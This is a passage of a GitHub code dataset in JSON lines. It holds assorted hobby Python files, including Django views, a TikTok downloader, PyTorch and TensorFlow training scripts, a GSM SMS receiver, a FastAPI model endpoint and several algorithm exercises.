DealerForm(request.POST)\n if form.is_valid():\n new_dealer = Dealer(\n name = form.cleaned_data['name'],\n user = request.user\n )\n new_dealer.save()\n return redirect(new_dealer)\n else:\n return redirect(reverse('dealers:dealer_create'))\n\n\nclass DealerDetail(DetailView):\n context_object_name = 'dealer'\n slug_field = 'name'\n queryset = Dealer.objects.all()\n\n\nclass DealerList(ListView):\n context_object_name = 'dealers'\n queryset = Dealer.objects.all()\n\n\nclass DealerUpdate(View):\n\n def get(self, request, slug):\n dealer = get_object_or_404(Dealer, name__iexact=slug)\n if request.user == dealer.user:\n context = {'form':DealerForm(initial=dealer)}\n return render(request, 'dealers/dealer_update.html', context)\n else:\n HttpResponse('You is not owner')\n\n def post(self, request, slug):\n dealer = get_object_or_404(Dealer, name__iexact=slug)\n if request.user == dealer.user:\n form = DealerForm(request.user, request.POST)\n if form.is_valid():\n new_dealer = Dealer(\n name = form.cleaned_data['name'],\n dealer = form.cleaned_data['dealer']\n )\n new_dealer.save()\n return redirect(new_dealer)\n else:\n return redirect(reverse('dealership:dealership_update'))\n else:\n HttpResponse('You is not owner')\n\n","repo_name":"WhiteJamer/dealerapp","sub_path":"dealers/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2178,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"15664124624","text":"import logging\nfrom bot.engines.abstract import Video, AbstractEngine\nfrom utils import 
exceptions, sys_config, format_size\nimport re, requests, hashlib, os, random\nfrom urllib.parse import quote\n\nPHRASES = [\n \"📞 Asking Xi's permission to download\",\n \"🤙 Contacting with agent in TT headquaters\",\n \"✂️ Cutting TT webpage\",\n \"📛 Breaking through chinese firewall\",\n \"🔎 Searching video\"\n]\n\nclass TiktokEngine(AbstractEngine):\n def __init__(self) -> None:\n super().__init__()\n\n def consist_type(self, url) -> bool:\n tiktok = re.findall(r\"\\/\\/.*vm.tiktok\\.com\\/\",url)\n if len(tiktok) > 0:\n return True\n else:\n return False\n\n def proceed(self, url, notifier, session=requests.Session()) -> Video:\n self.notifier = notifier\n self.session = session\n video = Video(url=url)\n if not self.consist_type(url):\n return video\n\n name_hash = self.name_to_hash(video.url)\n if os.path.exists(self.get_downloaded_file_abspath(name_hash)):\n path = self.get_downloaded_file_abspath(name_hash)\n file_size = os.path.getsize(path)\n video.size = file_size\n video.path = path\n logging.info(\"Return saved video: {}\".format(path))\n return video\n\n try:\n if len(re.findall(r'(.*tiktok\\.com\\/@.*\\/live)', url)) > 0:\n raise exceptions.DownloadError(\"Can't download tiktok live stream. Try another url\")\n\n self.notifier.update_status(random.choice(PHRASES))\n\n video_link, video_id = None, None\n for i in range(3):\n self.notifier.make_progress_bar(i*10)\n\n tt_url = f\"https://tikmate.online/?lang=nl\"\n response = requests.post(f\"{sys_config('SPLASH_URL')}/execute\", json={\n \"url\" : \"https://tikmate.online/?lang=nl\",\n \"lua_source\" : f\"\"\"\n function main(splash, args)\n splash:on_request(function(request)\n request.headers['user-agent'] = \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.81 Safari/537.36\"\n end)\n splash:go(args.url)\n assert(splash:wait(0.5))\n splash:runjs('document.getElementsByName(\"url\")[0].value=\"{url}\";document.getElementsByTagName(\"form\")[0].submit();')\n assert(splash:wait(3)) \n local title = splash:evaljs('document.getElementsByClassName(\"videotikmate-middle center\")[0].children[1].innerText') \n return {{\n html = splash:html(),\n title = title\n }}\n end\n \"\"\"\n })\n\n self.notifier.make_progress_bar(30)\n html = response.json().get(\"html\")\n if not html: \n continue \n\n matches_id = re.search(r' Video:\n return TiktokEngine().proceed(url, notifier, session)\n\n\n","repo_name":"Soebb/videofetcher","sub_path":"videofetcher/bot/engines/1_wowm_tiktok_engine.py","file_name":"1_wowm_tiktok_engine.py","file_ext":"py","file_size_in_byte":4297,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"71243861334","text":"import cv2\nimport torchvision\nimport numpy as np\nimport torch\nimport os\nimport json\nimport random\nfrom torchvision import transforms\nimport moviepy.editor as mp\nfrom PIL import Image\n\n# This Dataset can return either rgb frames or optical flow\nclass YT8M_Single_Modality(torch.utils.data.Dataset):\n def __init__(self, root, clip_length, transform, modality='rgb', temp_aug=True):\n self.root = root\n self.clip_length = clip_length\n self.transform = transform\n self.buffer = 2048\n self.clips = []\n self.temp_aug = temp_aug\n f = open(\"durations.json\",\"r\")\n self.durations = json.load(f)\n f.close()\n for k, v in self.durations.items():\n for i in range(v//(self.clip_length+self.buffer)):\n self.clips.append((k, i*(self.clip_length+self.buffer)))\n random.seed(42)\n 
random.shuffle(self.clips)\n \n def __len__(self):\n return len(self.clips)\n\n def __getitem__(self, index):\n vid, start = self.clips[index]\n rgb = np.load(self.root+vid+'.npz')[modality]\n start1 = start\n start2 = start\n if self.temp_aug:\n start1 = start1 + np.random.choice(range(self.clip_length))\n start2 = start2 + np.random.choice(range(self.clip_length))\n end1 = start1 + self.clip_length\n end2 = start2 + self.clip_length\n seq_idx = np.concatenate([np.arange(start1,end1), np.arange(start2,end2)])\n seq_rgb = [Image.fromarray(rgb[i,:,:,:].squeeze()) for i in seq_idx]\n return torch.stack(self.transform(seq_rgb), 1)\n \nclass YT8M_RGB_Flow(torch.utils.data.Dataset):\n def __init__(self, root_rgb, root_flow, clip_length, transform, temp_aug=True):\n self.root_rgb = root_rgb\n self.root_flow = root_flow\n self.clip_length = clip_length\n self.transform = transform\n self.temp_sampling = 128\n self.buffer = 2048\n self.clips = []\n self.temp_aug = temp_aug\n f = open(\"durations.json\",\"r\")\n self.durations = json.load(f)\n f.close()\n instance_number = 0\n for k, v in self.durations.items():\n for i in range(v//(self.clip_length+self.buffer)):\n self.clips.append((k, i*(self.clip_length+self.buffer), instance_number))\n instance_number = instance_number + 1\n random.seed(42)\n random.shuffle(self.clips)\n\n def __len__(self):\n return len(self.clips)\n \n def frame_sampler(self, start, rgb, flow):\n total_time = rgb.shape[0]\n start1 = start\n start2 = start\n if self.temp_aug:\n start1 = start1 + np.random.choice(range(self.clip_length))\n start2 = start2 + np.random.choice(range(self.clip_length))\n end1 = start1 + self.clip_length\n end2 = start2 + self.clip_length\n seq_idx = np.concatenate([np.arange(start1,end1), np.arange(start2,end2)])\n seq_rgb = [Image.fromarray(rgb[i,:,:,:].squeeze()) for i in seq_idx] # create a list of images for preprocessing\n seq_flow = [Image.fromarray(flow[i,:,:,:].squeeze()) for i in seq_idx]\n return seq_rgb, seq_flow\n \n def __getitem__(self, index):\n vid, l, instance_id = self.clips[index]\n arr = np.load(self.root_rgb+vid+'.npz')\n rgb = arr['rgb']\n flow = arr['flow']\n seq_rgb, seq_flow = self.frame_sampler(l,rgb,flow)\n transform = self.transform\n seq = transform(seq_rgb[0:self.clip_length] + seq_flow[0:self.clip_length] \\\n + seq_rgb[self.clip_length::] + seq_flow[self.clip_length::])\n seq1 = seq[0:self.clip_length*2] # rgb, flow\n seq2 = seq[self.clip_length*2::] # rgb, flow\n seq1 = torch.stack(seq1, 1)\n seq2 = torch.stack(seq2, 1)\n return (seq1, seq2), instance_id","repo_name":"anup-h/meta-clr","sub_path":"dataset.py","file_name":"dataset.py","file_ext":"py","file_size_in_byte":3852,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"42924571105","text":"# import sys\n# input = sys.stdin.readline\n\n# n,m = map(int,input().split())\n# data = []\n# for _ in range(n):\n# \trow = list(map(int,input().split()))\t\t\n# \tfor _ in range(row[2]):\n# \t\tdata.append((row[0],row[1]))\n\n\n# temp = [[] for _ in range(m+1)]\n\n# def solution():\n# \tdp = [0] * (m+1)\n\n# \tfor i,item in enumerate(data):\n# \t\tc,s = item[0],item[1]\n# \t\tfor j in range(c,m+1):\n\n# \t\t\torigin = dp[j] \n# \t\t\tsum = dp[j-c] + s\n\n# \t\t\tif (c,i) not in temp[c]:\n# \t\t\t\tif origin >= sum:\n# \t\t\t\t\tdp[j] = origin\t\t\t\t\t\n# \t\t\t\telse:\n# \t\t\t\t\tdp[j] = sum\t\t\t\t\n# \t\t\t\t\ttemp[j] = temp[j-c]\n# \t\t\t\t\ttemp[j].append((c,i))\n\n# \t\tprint(temp)\n\n# \tprint(dp)\n\n\n# 
solution()\n\nimport sys\ninput = sys.stdin.readline\nN, M = map(int, input().split())\n\ndp = [0 for _ in range(M+1)]\nweight, satisfaction = [], []\nfor _ in range(N):\n V, C, K = map(int, input().split())\n\n idx = 1\n while K > 0:\n tmp = min(idx, K)\n\n weight.append(V * tmp)\n satisfaction.append(C * tmp)\n\n idx *= 2\n K -= tmp\n\nprint(weight)\nprint(satisfaction)\n# for i in range(len(weight)):\n# for j in range(M, 0, -1):\n# if j >= weight[i]:\n# dp[j] = max(dp[j], dp[j-weight[i]] + satisfaction[i])\n\nfor i,w in enumerate(weight):\n\tfor j in range(M,w-1,-1):\t\t\n\t\tdp[j] = max(dp[j], dp[j-weight[i]] + satisfaction[i])\n\nprint(dp[M])","repo_name":"Junnjjj/Algorithm","sub_path":"Sample_Question/DP/12920.py","file_name":"12920.py","file_ext":"py","file_size_in_byte":1313,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"24243761122","text":"from ecomm.model.base_model import BaseModel\n\n\nclass User(BaseModel):\n\n def __init__(self, **kwargs):\n self.customer_id = kwargs.get('customer_id')\n self.name = kwargs.get('name')\n self.email = kwargs.get('email')\n self.address = kwargs.get('address')\n self.table = \"User\"\n self.meta = ('customer_id', 'name', 'email', 'address')\n print(kwargs)\n super().__init__()\n\n\nuser1 = User(customer_id = 2222323, name = 'kdhushsdsal', email='khushalt5@gmail.com', address= 'Pune')\nuser1.on_delete()","repo_name":"khushalt/ecommerce_cli","sub_path":"model/user.py","file_name":"user.py","file_ext":"py","file_size_in_byte":547,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"67"} +{"seq_id":"18643810717","text":"import os\nimport platform\n\nfrom twisted.internet import defer\n\nfrom .. import data, helper\nfrom p2pool.util import pack\n\nP2P_PREFIX = '04040404'.decode('hex') #messagestart\nP2P_PORT = 19967\nADDRESS_VERSION = 55 #pubkey_address\nRPC_PORT = 26667\nRPC_CHECK = defer.inlineCallbacks(lambda bitcoind: defer.returnValue(\n 'pwnycoinaddress' in (yield bitcoind.rpc_help()) and\n not (yield bitcoind.rpc_getinfo())['testnet']\n ))\nSUBSIDY_FUNC = lambda height: 6144*100000000 if height<8640 else 2048*100000000 >> (height * 1)//172800\nPOW_FUNC = data.hash256\nBLOCK_PERIOD = 30 # s\nSYMBOL = 'PWNY'\nCONF_FILE_FUNC = lambda: os.path.join(os.path.join(os.environ['APPDATA'], 'pwnycoin') if platform.system() == 'Windows' else os.path.expanduser('~/Library/Application Support/pwnycoin/') if platform.system() == 'Darwin' else os.path.expanduser('~/.pwnycoin'), 'pwnycoin.conf')\nBLOCK_EXPLORER_URL_PREFIX = 'http://www.pwnycoin.com/?'\nADDRESS_EXPLORER_URL_PREFIX = 'http://www.pwnycoin.com/?'\nTX_EXPLORER_URL_PREFIX = 'http://www.pwnycoin.com/?'\nSANE_TARGET_RANGE = (2**256//2**32//1000 - 1, 2**256//2**32 - 1)\nDUMB_SCRYPT_DIFF = 1\nDUST_THRESHOLD = 1e8\n","repo_name":"amarian12/p2pool-adaptive","sub_path":"p2pool/bitcoin/networks/pwnycoin.py","file_name":"pwnycoin.py","file_ext":"py","file_size_in_byte":1165,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"67"} +{"seq_id":"26097079656","text":"from keras.models import Sequential\nfrom keras.layers.core import Dense\n\nimport pandas as pd\nimport numpy as np\nfrom sklearn.preprocessing import LabelEncoder\n\nhealth = pd.read_csv('strokecsv/healthcare-dataset-stroke-data.csv')\nle = LabelEncoder()\nhealth[health.select_dtypes(include=['object']).columns] = 
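The 12920 solution above expands an item available K times into power-of-two bundles (1, 2, 4, ..., remainder) so that plain 0/1 knapsack can represent every count from 0 to K while adding only O(log K) items. The decomposition in isolation, with a quick sanity check (split_counts is an illustrative name):

def split_counts(k):
    bundles, size = [], 1
    while k > 0:
        take = min(size, k)
        bundles.append(take)
        k -= take
        size *= 2
    return bundles

print(split_counts(13))  # [1, 2, 4, 6]: every count 0..13 is a subset sum of these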
health[health.select_dtypes(include=['object']).columns].apply(le.fit_transform)\nhealth.head()\n\nprint(health.head())\nhealth = np.array(health)\n\nX = np.array(health[:,1:11])\nY = np.array(health[:,11])\nprint(X)\nmodel = Sequential()\nmodel.add(Dense(24, input_dim=10, activation='relu'))\nmodel.add(Dense(10, activation='relu'))\nmodel.add(Dense(1, activation='sigmoid'))\n\n# 모델 컴파일\nmodel.compile(loss='mean_squared_error',\n optimizer='adam',\n metrics=['accuracy'])\n\n# 모델 실행\nmodel.fit(X, Y, epochs=200, batch_size=500)\n\nprint()\nprint(model.predict(np.array([0.0, 90.0, 0.0, 0.0, 0.0, 0.0, 0.0, 200.0, 40.0, 0.0]).reshape(1,10)))\n","repo_name":"jeajin/Machine_Learning","sub_path":"Simulator/pre.py","file_name":"pre.py","file_ext":"py","file_size_in_byte":971,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"25990472268","text":"\"\"\"\nthreading模块创建线程\n直接从threading.Thread继承创建一个新的子类,并实例化猴调用start()方法启动新线程,即它调用了线程的run()方法\n\"\"\"\n\nimport threading\nimport time\n\nexitFlag = 0\n\n# 括号里是继承一个类,\nclass myThread(threading.Thread):\n def __init__(self, thread_id, name, counter):\n # 子类继承父类的__init__方法,两种写法都可以\n # threading.Thread.__init__(self)\n super(myThread, self).__init__()\n self.thread_id = thread_id\n self.name = name\n self.counter = counter\n\n def run(self):\n print(\"开始线程:\", self.name)\n print_time(self.name, self.counter, 5)\n print(\"退出线程:\", self.name)\n\ndef print_time(thread_name, delay, counter):\n while counter:\n if exitFlag:\n thread_name.exit()\n time.sleep(delay)\n print(\"{0}:{1}\".format(thread_name, time.ctime(time.time())))\n counter -= 1\n\n# 创建新线程\nthread1 = myThread(1, 'thread_1', 1)\nthread2 = myThread(2, 'thread_2', 2)\n\n# 开启新线程\nthread1.start()\nthread2.start()\nprint('当前线程变量:', threading.currentThread())\nprint('正在运行的线程list:', threading.enumerate())\nprint('正在运行的线程数量:', threading.activeCount())\nprint(\"线程名称:\", thread1.getName())\nprint(\"是否还在活动\", thread1.is_alive())\nthread1.join()\nthread2.join()\n\nprint(\"退出主线程\")","repo_name":"shangxinzb/python_study","sub_path":"basics/threading/theading.py","file_name":"theading.py","file_ext":"py","file_size_in_byte":1450,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"46591119107","text":"from __future__ import print_function\nimport logging\nimport time\nfrom gsmmodem.modem import GsmModem\nfrom Gsm.Test.handle_sms import handleSms\n\nLAST_TIME = time.time()\n#It is different between computers\nPORT = \"COM7\"\nBAUDRATE = 115200\n# SIM card PIN (if any)\nPIN = None\n\ndef test():\n print(\"test....\")\n\n# initializing modem\ndef main():\n\n print('Initializing modem...')\n logging.basicConfig(format='%(levelname)s: %(message)s', level=logging.DEBUG)\n modem = GsmModem(PORT, BAUDRATE, smsReceivedCallbackFunc=handleSms)\n modem.smsTextMode = False\n modem.connect(PIN)\n print('Waiting for SMS message...')\n try:\n test()\n modem.rxThread.join(2 ** 20)\n finally:\n print(\"Trying from inside while loop\")\n modem.close()\n\nif __name__ == '__main__':\n\n while True:\n try:\n main()\n except:\n time.sleep(2)\n print(\"Trying one more time\")\n continue\n","repo_name":"MohammadMahdiOmid/GSM-Modem","sub_path":"Gsm/Test/recieve_sms.py","file_name":"recieve_sms.py","file_ext":"py","file_size_in_byte":947,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"23353946854","text":"import os, glob, re, sys, argparse, time, random\r\nfrom 
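In the stroke record above a single LabelEncoder is re-fit on each object column through DataFrame.apply, so the encoder's fitted state afterwards describes only the last column encoded. A sketch that keeps one encoder per column instead, which preserves inverse_transform; the toy frame is illustrative:

import pandas as pd
from sklearn.preprocessing import LabelEncoder

df = pd.DataFrame({"gender": ["Male", "Female", "Male"], "smokes": ["yes", "no", "no"]})
encoders = {col: LabelEncoder().fit(df[col]) for col in df.columns}
for col, enc in encoders.items():
    df[col] = enc.transform(df[col])

print(df)                                            # integer-coded columns
print(encoders["gender"].inverse_transform([0, 1]))  # ['Female' 'Male'] -- mapping kept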
random import shuffle\r\nimport tensorflow as tf\r\nimport numpy as np\r\nfrom PIL import Image\r\nfrom nf_UTILS import *\r\nfrom nf_MODEL import model\r\n#from tensorflow.contrib.slim.nets import resnet_v1\r\n#import tensorflow.contrib.slim as slim\r\n\r\ntf.logging.set_verbosity(tf.logging.WARN)\r\n\r\nEXP_DATA = '20190601-av1-2k-sepGrad-small'\r\nTRAIN_DATA_PATH = \"/home/chenjs/nf/data/train/small_low\"\r\nTRAIN_LABEL_PATH = \"/home/chenjs/nf/data/train/small_high\"\r\nVALID_DATA_PATH = \"/home/chenjs/ee-new/data/test/18/av1_18_qp53\"\r\nVALID_LABEL_PATH = \"/home/chenjs/ee-new/data/test/18/gt\"\r\n#VALID_DATA_PATH = ''\r\n#VALID_LABEL_PATH = ''\r\nLOG_PATH = \"./logs/%s/\"%(EXP_DATA)\r\nCKPT_PATH = \"./checkpoints/%s/\"%(EXP_DATA)\r\nDEVIDE_SIZE = 0\r\nPATCH_SIZE = (64,64)\r\nBATCH_SIZE = 64\r\nBASE_LR = 0.0001\r\nLR_DECAY_RATE = 0.5\r\nLR_DECAY_STEP = 50\r\nMAX_EPOCH = 600\r\nIMAGE_BATCH = 4\r\n\r\nparser = argparse.ArgumentParser()\r\nparser.add_argument(\"--model_path\")\r\nargs = parser.parse_args()\r\nmodel_path = args.model_path\r\n\r\n'''\r\nph : Place Holder\r\nso : Sess Output\r\n\r\n'''\r\nif __name__ == '__main__':\r\n\r\n #===================prepare data==================#\r\n #The following variables contain the whole training/validation set.\r\n #They contain a large number of [imagedate, label]\r\n train_data = get_train_pair(TRAIN_DATA_PATH, TRAIN_LABEL_PATH)\r\n #train_data = get_train_list(load_file_list(TRAIN_DATA_PATH), load_file_list(TRAIN_LABEL_PATH))\r\n\r\n len_train_data = len(train_data)\r\n #print(\"num of train data:%d\"%(len_train_data))\r\n stepsPerEpoch = len_train_data // BATCH_SIZE\r\n\r\n if (VALID_LABEL_PATH and VALID_DATA_PATH):\r\n valid_data = get_train_pair(VALID_DATA_PATH, VALID_LABEL_PATH)\r\n phValInput = tf.placeholder('float32', shape=(1, None, None, 1))\r\n phValGt = tf.placeholder('float32', shape=(1, None, None, 1))\r\n\r\n valOutput = tf.multiply(tf.clip_by_value(model(phValInput), 0., 1.), 255)\r\n\r\n\r\n #==================define model==================#\r\n with tf.name_scope('input_scope'):\r\n phTrainInput = tf.placeholder('float32', shape=(BATCH_SIZE, PATCH_SIZE[0], PATCH_SIZE[1], 1))\r\n phTrainGt = tf.placeholder('float32', shape=(BATCH_SIZE, PATCH_SIZE[0], PATCH_SIZE[1], 1))\r\n\r\n trainOutput = tf.multiply(tf.clip_by_value(model(phTrainInput), 0., 1.), 255)\r\n\r\n with tf.name_scope('loss_scope'):\r\n\r\n loss = tf.reduce_mean(tf.square(tf.subtract(trainOutput, phTrainGt)))\r\n #loss = tf.reduce_sum(tf.square(tf.subtract(trainOutput, phTrainGt)))\r\n weights = tf.get_collection(tf.GraphKeys.WEIGHTS)\r\n loss += tf.add_n(weights) * 1e-4\r\n\r\n avg_loss = tf.placeholder('float32')\r\n tf.summary.scalar(\"avg_loss\", avg_loss)\r\n\r\n\r\n with tf.name_scope('optimization'):\r\n global_step = tf.Variable(0, trainable=False)\r\n learning_rate = tf.train.exponential_decay(BASE_LR, global_step, LR_DECAY_STEP*stepsPerEpoch, LR_DECAY_RATE, staircase=True)\r\n tf.summary.scalar(\"learning rate\", learning_rate)\r\n\r\n optimizer = tf.train.AdamOptimizer(learning_rate, 0.9)\r\n opt = optimizer.minimize(loss, global_step=global_step)\r\n\r\n saver = tf.train.Saver(max_to_keep=0)\r\n\r\n config = tf.ConfigProto(allow_soft_placement=True)\r\n config.gpu_options.allow_growth = True\r\n\r\n #========================start training==================#\r\n with tf.Session(config=config) as sess:\r\n\r\n makeDirsIfNotExist(LOG_PATH)\r\n makeDirsIfNotExist(CKPT_PATH)\r\n\r\n\r\n merged = tf.summary.merge_all()\r\n file_writer = 
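The training script above schedules its learning rate with tf.train.exponential_decay(..., staircase=True), which computes base_lr * decay_rate ** floor(step / decay_steps). The same arithmetic as a plain function, with values chosen to mirror BASE_LR=1e-4 and LR_DECAY_RATE=0.5 (stepsPerEpoch=100 is an assumed figure, not taken from the data):

def staircase_lr(base_lr, decay_rate, decay_steps, step):
    return base_lr * decay_rate ** (step // decay_steps)

# LR_DECAY_STEP=50 epochs at an assumed 100 steps/epoch -> decay_steps = 5000
print(staircase_lr(1e-4, 0.5, 5000, 12500))  # 2.5e-05 after two completed decay periods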
tf.summary.FileWriter(LOG_PATH, sess.graph)\r\n\r\n sess.run(tf.global_variables_initializer())\r\n\r\n if model_path:\r\n print(\"restore model...\")\r\n saver.restore(sess, model_path)\r\n print(\"Done\")\r\n\r\n for epoch in range(MAX_EPOCH):\r\n shuffle(train_data)\r\n total_g_loss, n_iter = 0, 0\r\n\r\n start_time = time.time()\r\n\r\n for idx in range(stepsPerEpoch):\r\n input_data, gt_data = get_batch_data(train_data, BATCH_SIZE, idx)\r\n #input_data, gt_data, cbcr_data = prepare_nn_data(train_data, idx)\r\n feed_dict = {phTrainInput: input_data, phTrainGt: gt_data}\r\n _, soLoss, soTrainOutput, g_step= sess.run([opt, loss, trainOutput, global_step], feed_dict=feed_dict)\r\n\r\n total_g_loss += soLoss\r\n n_iter += 1\r\n\r\n lr, summary = sess.run([learning_rate, merged], {avg_loss:total_g_loss/n_iter})\r\n file_writer.add_summary(summary, epoch)\r\n\r\n epoch_time = time.time() - start_time\r\n avgLoss = total_g_loss/n_iter\r\n tf.logging.warning(\"Epoch: [%4d/%4d] time: %4.4f\\tloss: %.8f\\tlr: %.8f\"%(epoch, MAX_EPOCH, epoch_time, avgLoss, lr))\r\n\r\n #There is no need to save ckpt for every epoch; besides it costs much space.\r\n if ((epoch+1) % 10 == 0):\r\n saver.save(sess, os.path.join(CKPT_PATH, \"%s_%03d.ckpt\"%(EXP_DATA, epoch)))\r\n\r\n #=======validation========#\r\n #It ought to be a geninue validation set, but here directly uses test set for the sack of convience, because this test set is relatively small.\r\n if (VALID_LABEL_PATH and VALID_DATA_PATH):\r\n sumPsnr = 0\r\n numValidData = len(valid_data)\r\n for i in range(numValidData):\r\n valid_input = np.reshape(valid_data[i][0], (1, valid_data[i][0].shape[0], valid_data[i][0].shape[1], valid_data[i][0].shape[2]))\r\n soValidOutput = sess.run(valOutput, feed_dict={phValInput:valid_input})\r\n sumPsnr += psnr(valid_data[i][1], soValidOutput)\r\n avgPsnr = sumPsnr / numValidData\r\n tf.logging.warning(\"Epoch: %d, avgPsnrOnValid: %.4f\"%(epoch, avgPsnr))\r\n\r\n","repo_name":"linyiduo123/AV1_small_model","sub_path":"nf_UNK.py","file_name":"nf_UNK.py","file_ext":"py","file_size_in_byte":5945,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"67"} +{"seq_id":"24342306578","text":"'''\nDesign a logger system that receive stream of messages along with its timestamps, each message should be printed if and only if it is not printed in the last 10 seconds.\n\nGiven a message and a timestamp (in seconds granularity), return true if the message should be printed in the given timestamp, otherwise returns false.\n\nIt is possible that several messages arrive roughly at the same time.\n\nExample:\n\nLogger logger = new Logger();\n\n// logging string \"foo\" at timestamp 1\nlogger.shouldPrintMessage(1, \"foo\"); returns true; \n\n// logging string \"bar\" at timestamp 2\nlogger.shouldPrintMessage(2,\"bar\"); returns true;\n\n// logging string \"foo\" at timestamp 3\nlogger.shouldPrintMessage(3,\"foo\"); returns false;\n\n// logging string \"bar\" at timestamp 8\nlogger.shouldPrintMessage(8,\"bar\"); returns false;\n\n// logging string \"foo\" at timestamp 10\nlogger.shouldPrintMessage(10,\"foo\"); returns false;\n\n// logging string \"foo\" at timestamp 11\nlogger.shouldPrintMessage(11,\"foo\"); returns true;\n\n'''\n\n'''\nThe idea is that we keep a hashtable/dictionary with the message as key, \nand its timestamp as the value. 
\nThe hashtable keeps all the unique messages along with the latest timestamp that the message was printed.\n\nAlgorithm\n\nWe initialize a hashtable/dictionary to keep the messages along with the timestamp.\n\nAt the arrival of a new message, the message is eligible to be printed with either of the two conditions as follows:\n\ncase 1). we have never seen the message before.\n\ncase 2). we have seen the message before, and it was printed more than 10 seconds ago.\n\nIn both of the above cases, we would then update the entry that is associated with the message in the hashtable, with the latest timestamp.\n\n\n'''\nclass Logger(object):\n\n def __init__(self):\n \"\"\"\n Initialize your data structure here.\n \"\"\"\n self._msg_dict = {}\n \n def shouldPrintMessage(self, timestamp, message):\n \"\"\"\n Returns true if the message should be printed in the given timestamp, otherwise returns false.\n \"\"\"\n if message not in self._msg_dict:\n # case 1). add the message to print\n self._msg_dict[message] = timestamp\n return True\n\n if timestamp - self._msg_dict[message] >= 10:\n # case 2). update the timestamp of the message\n self._msg_dict[message] = timestamp\n return True\n else:\n return False\n","repo_name":"pnkumar9/PythonScripts","sub_path":"Easy-100/Logger-Rate-Limiter.py","file_name":"Logger-Rate-Limiter.py","file_ext":"py","file_size_in_byte":2426,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"15891268078","text":"inp = \"abcdefghijklmnopqrstuvwxyz0123456789!@#$%^&*(\"\r\nout = \"agmsy4!&bfhlnrtxz359@^*ceikoquw0268#%(djpv17$\"\r\n\r\ncipher=\"Yl 410b8ofasa503ea70f6au gi2cef36d5492r 3d74b\"\r\n\r\na=[]\r\nb=[]\r\nc=[]\r\n\r\nfor i in inp:\r\n a.append(i)\r\n\r\nfor j in out:\r\n b.append(j)\r\n\r\nfor i in a:\r\n for j in range(0,len(b)):\r\n if i == b[j]:\r\n c.append(j)\r\n\r\nprint(c)\r\noutput=[]\r\n\r\nfor i in range(0,len(cipher)):\r\n output.append('')\r\n\r\nj=0\r\nret=''\r\nfor i in c:\r\n output[j]=cipher[i]\r\n j = j+1\r\n\r\nfor i in output:\r\n ret=ret+i\r\nprint(ret)\r\n","repo_name":"dracoranger/random-items","sub_path":"descrambler.py","file_name":"descrambler.py","file_ext":"py","file_size_in_byte":543,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"1045260303","text":"from pydantic.types import Json\r\nimport uvicorn \r\nfrom fastapi import FastAPI\r\nfrom fastapi.encoders import jsonable_encoder\r\nfrom typing import List\r\nimport numpy as np \r\nimport joblib \r\nfrom pydantic import BaseModel \r\n\r\n\r\n\r\n#load model\r\n\r\napp = FastAPI()\r\n\r\nmodel = joblib.load(\"myModel.sav\")\r\n\r\n@app.get('/')\r\ndef index():\r\n return {\"API\" : \"Ready to call\"}\r\n\r\nclass OutData(BaseModel):\r\n pred : float\r\n\r\nclass DataType(BaseModel):\r\n product : str\r\n calories : float \r\n carbs : float \r\n time : str \r\n dish : str \r\n heat : str \r\n fat : float \r\n no_ingredients : int \r\n proteins : float \r\n protein_class : str \r\n cuisine : str \r\n\r\n@app.post('/predict', response_model=OutData)\r\ndef prediction(data : DataType):\r\n data = data.dict() \r\n prd = data.get(\"product\")\r\n cal = data.get(\"calories\")\r\n carb = data.get(\"carbs\")\r\n time = data.get(\"time\")\r\n dsh = data.get(\"dish\")\r\n heat = data.get(\"heat\")\r\n fat = data.get(\"fat\")\r\n ingrd = data.get(\"no_ingredients\")\r\n prot = data.get(\"proteins\")\r\n pro_clss = data.get(\"protein_class\")\r\n cuisine = data.get(\"cuisine\")\r\n 
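A quick check of the rate limiter above against the sequence its docstring walks through (this assumes the Logger class exactly as defined in the record):

logger = Logger()
events = [(1, "foo"), (2, "bar"), (3, "foo"), (8, "bar"), (10, "foo"), (11, "foo")]
print([logger.shouldPrintMessage(t, m) for t, m in events])
# -> [True, True, False, False, False, True], matching the docstring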
answer = model.predict([prd, cal, carb, time, dsh, heat, fat, ingrd, prot, pro_clss, cuisine])\r\n answer = np.exp(answer)\r\n answer = OutData(pred = answer)\r\n answer = jsonable_encoder(answer)\r\n \r\n return answer\r\n \r\n '''\r\n if answer:\r\n return {\"statusCode\": 200,\r\n \"body\": {\"Expected sales\": answer}}\r\n else:\r\n return {\"status\": 404,\r\n \"body\": {\"Message\": \"Are you sure you're using the right data ?\"}}\r\n \r\n\r\n if answer < 1000:\r\n return {f\"Sales is low with value{answer}. Ensure to increase your input\"}\r\n\r\n else:\r\n return {f\"Sales is high with value {answer}. You can still increase your input\"}\r\n\r\n'''\r\nif __name__ == \"__main__\":\r\n uvicorn.run(app, host='127.0.0.1', port=8000)\r\n","repo_name":"Khamaldeeen/intertrack-fastapi-grp8","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1920,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"30242211087","text":"class Solution:\n def updateMatrix(self, matrix: List[List[int]]) -> List[List[int]]:\n # BFS\n rows,cols = len(matrix),len(matrix[0])\n deltas = [(1,0),(-1,0),(0,1),(0,-1)] # 4 adjacent directions we can move in\n \n queue = deque() \n max_dist = max(rows,cols)\n \n for r in range(rows):\n for c in 